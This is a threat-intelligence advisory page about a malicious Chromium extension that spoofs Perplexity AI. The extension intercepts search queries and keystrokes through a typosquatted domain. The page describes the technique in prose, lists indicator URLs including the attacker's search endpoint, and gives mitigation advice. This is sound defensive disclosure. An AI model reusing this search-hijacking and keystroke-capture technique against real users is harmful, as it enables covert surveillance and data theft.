Chromium extension uses AI‑related branding to redirect browser search
Microsoft Threat Intelligence identified a malicious Chromium extension spoofing Perplexity AI to deceive users into installation. The extension's primary objective involves search traffic interception and data collection through Manifest Version 3 capabilities and declarativeNetRequest rules. It routes both full search queries and real-time keystrokes through attacker-controlled infrastructure hosted on a typosquatted domain before redirecting to legitimate search providers. The extension overrides browser default search settings, captures user input at keystroke-level, and uses suspicious permissions inconsistent with legitimate AI assistants. The threat demonstrates how actors operationalize AI branding as social engineering vectors. Google removed the extension following responsible disclosure. Organizations should strengthen user awareness training and implement layered security strategies to detect similar threats.
AI Analysis
Technical Summary
Microsoft Threat Intelligence identified a malicious Chromium extension spoofing the Perplexity AI brand to deceive users into installation. The extension's main function was to intercept search traffic and collect data, including real-time keystrokes, using Manifest Version 3 capabilities and declarativeNetRequest rules. It routed full search queries and keystrokes through attacker-controlled infrastructure hosted on a typosquatted domain (perplexity-ai.online) before redirecting users to legitimate search providers. The extension also overrode browser default search settings and requested permissions inconsistent with legitimate AI assistants. Google removed the extension following responsible disclosure. This campaign illustrates how threat actors use AI-related branding as a social engineering vector.
Potential Impact
The malicious extension compromises user privacy by capturing keystrokes and search queries, potentially exposing sensitive information. It hijacks browser search settings, redirecting traffic through attacker-controlled infrastructure, enabling data interception and possible further exploitation. The use of typosquatted domains increases the risk of user deception. Although no known exploits in the wild are reported, the data interception and keystroke capture pose a medium risk to affected users.
Mitigation Recommendations
Google has removed the malicious extension from the Chrome Web Store following responsible disclosure. Users should uninstall any suspicious extensions, especially those spoofing AI brands like Perplexity AI. Organizations should strengthen user awareness training to recognize social engineering tactics involving AI branding. Implement layered security controls to detect and block similar malicious extensions and monitor for unauthorized changes to browser settings. No official patch is applicable as this is a malicious extension rather than a software vulnerability.
Indicators of Compromise
- domain: perplexity-ai.online
- url: http://perplexity-ai.online/
- url: http://perplexity-ai.online/*
- url: http://perplexity-ai.online/search/
- url: https://perplexity-ai.online/favicon.ico
- url: https://perplexity-ai.online/search/
- url: https://perplexity-ai.online/search?output=firefox&q=
Chromium extension uses AI‑related branding to redirect browser search
Description
Microsoft Threat Intelligence identified a malicious Chromium extension spoofing Perplexity AI to deceive users into installation. The extension's primary objective involves search traffic interception and data collection through Manifest Version 3 capabilities and declarativeNetRequest rules. It routes both full search queries and real-time keystrokes through attacker-controlled infrastructure hosted on a typosquatted domain before redirecting to legitimate search providers. The extension overrides browser default search settings, captures user input at keystroke-level, and uses suspicious permissions inconsistent with legitimate AI assistants. The threat demonstrates how actors operationalize AI branding as social engineering vectors. Google removed the extension following responsible disclosure. Organizations should strengthen user awareness training and implement layered security strategies to detect similar threats.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
Microsoft Threat Intelligence identified a malicious Chromium extension spoofing the Perplexity AI brand to deceive users into installation. The extension's main function was to intercept search traffic and collect data, including real-time keystrokes, using Manifest Version 3 capabilities and declarativeNetRequest rules. It routed full search queries and keystrokes through attacker-controlled infrastructure hosted on a typosquatted domain (perplexity-ai.online) before redirecting users to legitimate search providers. The extension also overrode browser default search settings and requested permissions inconsistent with legitimate AI assistants. Google removed the extension following responsible disclosure. This campaign illustrates how threat actors use AI-related branding as a social engineering vector.
Potential Impact
The malicious extension compromises user privacy by capturing keystrokes and search queries, potentially exposing sensitive information. It hijacks browser search settings, redirecting traffic through attacker-controlled infrastructure, enabling data interception and possible further exploitation. The use of typosquatted domains increases the risk of user deception. Although no known exploits in the wild are reported, the data interception and keystroke capture pose a medium risk to affected users.
Mitigation Recommendations
Google has removed the malicious extension from the Chrome Web Store following responsible disclosure. Users should uninstall any suspicious extensions, especially those spoofing AI brands like Perplexity AI. Organizations should strengthen user awareness training to recognize social engineering tactics involving AI branding. Implement layered security controls to detect and block similar malicious extensions and monitor for unauthorized changes to browser settings. No official patch is applicable as this is a malicious extension rather than a software vulnerability.
Technical Details
- Author
- AlienVault
- Tlp
- white
- References
- ["https://www.microsoft.com/en-us/security/blog/2026/06/29/chromium-extension-uses-airelated-branding-redirect-browser-search/"]
- Adversary
- null
- Pulse Id
- 6a42d0b89159dccad1ff7879
- Threat Score
- null
Indicators of Compromise
Domain
| Value | Description | Copy |
|---|---|---|
domainperplexity-ai.online | — |
Url
| Value | Description | Copy |
|---|---|---|
urlhttp://perplexity-ai.online/ | — | |
urlhttp://perplexity-ai.online/* | — | |
urlhttp://perplexity-ai.online/search/ | — | |
urlhttps://perplexity-ai.online/favicon.ico | — | |
urlhttps://perplexity-ai.online/search/ | — | |
urlhttps://perplexity-ai.online/search?output=firefox&q= | — |
Threat ID: 6a43a6ca27e9c79719a5445c
Added to database: 06/30/2026, 11:21:46 UTC
Last enriched: 06/30/2026, 11:36:22 UTC
Last updated: 07/01/2026, 02:26:23 UTC
Views: 65
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.